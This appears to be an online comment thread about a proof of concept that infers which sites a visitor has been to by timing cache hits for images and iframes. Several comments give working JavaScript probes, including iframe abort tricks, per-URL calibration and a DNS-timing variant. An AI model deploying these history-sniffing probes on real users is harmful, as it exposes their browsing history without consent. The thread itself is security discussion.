It works. It works enough of the time and on enough browsers to be very relevant to anyone who cares about the privacy/security of internet users at large.
This is an impressive proof of concept, and an important thing to be discussing, yeah?
[EDIT] To clarify, I tested this on Firefox 8.0.1 on my 2011 iMac with Lion and it worked flawlessly: as I visited Facebook, Reddit, and Flickr one by one, each turned from gray to green on the subsequent test.
It did correctly detect some sites for me, but it gave one false positive and three false negatives. With that kind of error rate I just don't see it being taken seriously in anything that matters.
To test if a user has recently visited Facebook, see how long it takes for the Facebook logo to load when called from your own page. If it's relatively fast, you can assume the image has been cached by the user's browser ... meaning the user has recently visited Facebook. If it's relatively slow, you can assume no cached version of the logo is available, so the user probably hasn't visited Facebook recently.
Results are fuzzy because "relatively fast" and "relatively slow" are not precise.
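A minimal sketch of that image-timing idea, for the curious (the cutoff value and the logo URL are placeholder assumptions, not anything from the PoC):

    // Rough sketch of the image-timing probe. THRESHOLD_MS is a made-up
    // cutoff; a real test would need per-client calibration, which is
    // exactly why the results come out fuzzy.
    var THRESHOLD_MS = 50;

    function probeImage(url, callback) {
      var img = new Image();
      var start = new Date().getTime();
      img.onload = img.onerror = function () {
        var elapsed = new Date().getTime() - start;
        // Fast load => probably served from cache => likely visited.
        callback(elapsed < THRESHOLD_MS);
      };
      img.src = url;
    }

    // Illustrative URL only -- any static asset the site always serves works.
    probeImage('https://www.facebook.com/images/fb_icon.png',
               function (visited) { console.log('visited?', visited); });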
Instead, I time <iframe>s, which allows SOP violations to be trapped the moment the browser so much as starts thinking about rendering the target page. The other benefit is that <iframe> requests can be aborted quite easily when they take long enough for us to suspect a cache miss - before the request completes and gets cached.
The results should not be fuzzy, although the PoC uses hardcoded timings instead of doing calibration, which makes it a bit tricky with "outlier" clients (very fast or very slow).
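Something like the following captures the iframe variant as I understand it - note this simplified sketch times the load event rather than polling for the SOP exception described above, and the cutoff is a hardcoded guess, much like the PoC's:

    var CUTOFF_MS = 90;  // hardcoded guess, like the PoC; real code would calibrate

    function probeFrame(url, callback) {
      var frame = document.createElement('iframe');
      frame.style.display = 'none';
      var done = false;

      function finish(hit) {
        if (done) return;
        done = true;
        // Point the frame away first so an in-flight request is aborted
        // before the response completes and lands in the cache.
        frame.src = 'about:blank';
        document.body.removeChild(frame);
        callback(hit);
      }

      frame.onload = function () { finish(true); };           // loaded within cutoff: hit
      setTimeout(function () { finish(false); }, CUTOFF_MS);  // too slow: assume miss, abort

      document.body.appendChild(frame);
      frame.src = url;
    }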
I made some minor tweaks today, and the success rate should be greatly improved; there's now a mini-survey on the page, looks like ~90% of the people who bother to complete it are getting accurate results.
Better yet, do this calibration for each target URL. Knowing how long a miss takes vs. a hit will greatly increase your accuracy.
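One way to get a per-URL miss baseline - the cache-busting query string is my own assumption about how you'd force a miss, and it does mean the calibration fetch hits a slightly different URL:

    // Per-URL calibration: force a guaranteed miss with a unique query
    // string, and use that time as the baseline the real probe is
    // compared against.
    function measureMiss(url, callback) {
      var bustUrl = url + (url.indexOf('?') >= 0 ? '&' : '?') +
                    'bust=' + new Date().getTime();
      var img = new Image();
      var start = new Date().getTime();
      img.onload = img.onerror = function () {
        callback(new Date().getTime() - start);  // typical miss time for this URL
      };
      img.src = bustUrl;
    }

    // A real probe would then treat anything well under the measured
    // miss time -- say, half of it -- as a cache hit.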
Also, does this work for Google+ (I don't have an account)? I'd be surprised if it did, since it uses X-Frame-Options.
Obviously, this didn't work against me.
Nice PoC though, and thanks for the lack of press release ;)
Edit: I just tried this out and it appears that the looping JS blocks the iframe from loading. I would have figured the iframe would run in a separate JS thread. I'm wondering -- do all iframes share the same JS thread? Can one iframe block another? Anyway, it's clear that some sort of asynchronous solution is necessary.
Plus, if you do setInterval(..., 1) and then measure new Date().getTime() deltas, you will probably see that even if the browser isn't doing anything taxing, you get 100 ms or more every now and then...
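Easy to check for yourself - this just logs the deltas the comment above describes:

    // Quick check of timer jitter: with setInterval(..., 1) you'd expect
    // ~1 ms deltas, but occasional 100 ms+ gaps show up even when the
    // browser is otherwise idle.
    var last = new Date().getTime();
    var ticks = 0;
    var id = setInterval(function () {
      var now = new Date().getTime();
      var delta = now - last;
      if (delta >= 100) console.log('spike:', delta, 'ms');
      last = now;
      if (++ticks >= 1000) clearInterval(id);
    }, 1);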
Blogger - admin
Google search (UK)
If this is based on actual info taken from :visited selectors, apparently they are useless (maybe these entries show up because of banners or scripts loaded from those sites?), and one could do a better job by just faking it.
It's not; it's based on trying to load some URL from the website and measuring the time it takes. If you went there, it should be in the cache and take much less time to load.
It doesn't seem to work that well, though.
Nope, that security hole was patched already. https://blog.mozilla.com/security/2010/03/31/plugging-the-cs...
The one good thing that could come out of this is that websites with the giant bar of "follow me/like me" icons could size it differently based on whether they detect that the user has visited a given social media site.
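Something along these lines, say - detectVisited is a stand-in for whichever timing probe you trust, and the element id and class names are made up:

    // Hypothetical use: only render the full-size button for networks the
    // visitor appears to actually use.
    function detectVisited(url, callback) { callback(false); }  // stub probe

    detectVisited('https://www.facebook.com/', function (visited) {
      var btn = document.getElementById('fb-follow');  // made-up element id
      btn.className = visited ? 'social-btn-large' : 'social-btn-small';
    });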
The summary of the paper makes me sad -
> We are not aware of any practical countermeasures to these attacks. There seems to be little hope that effective countermeasures will be developed and deployed any time soon.
I'm more surprised that it thinks that I've logged into blogger (which I've never done on this computer) than that it misses my one-page visit to reddit about a week ago. And on the next round the results are reversed.
It worked for me on Chrome. The one linked now gives some weird entries.
The idea is interesting but, considering that the performance of the client machine can affect the results, it doesn't feel very viable.
What about DNS cache probing? Is it possible? I guess it will suffer from similar results but at smaller scale.
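You can't isolate DNS lookup time from JS, but a crude approximation might look like this (the probe path is made up, and connect time and network jitter get mixed in, so it would be even noisier than the HTTP-cache version):

    // Crude DNS-probe approximation: request a path that should 404 so the
    // HTTP cache can't help, and time the error event. A resolver cache
    // hit for the hostname shaves the DNS lookup off the total.
    function probeDns(host, callback) {
      var img = new Image();
      var start = new Date().getTime();
      img.onerror = img.onload = function () {
        callback(new Date().getTime() - start);
      };
      img.src = 'http://' + host + '/dns-probe-' + start + '.gif';
    }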
This is on Firefox 8.0 on Fedora Linux. Maybe the OS has a lot to do with the success rate?
Edit: I've just read through the technique, and there's no way it could depend on the OS. Anyway, this is way too inaccurate to be of any practical use.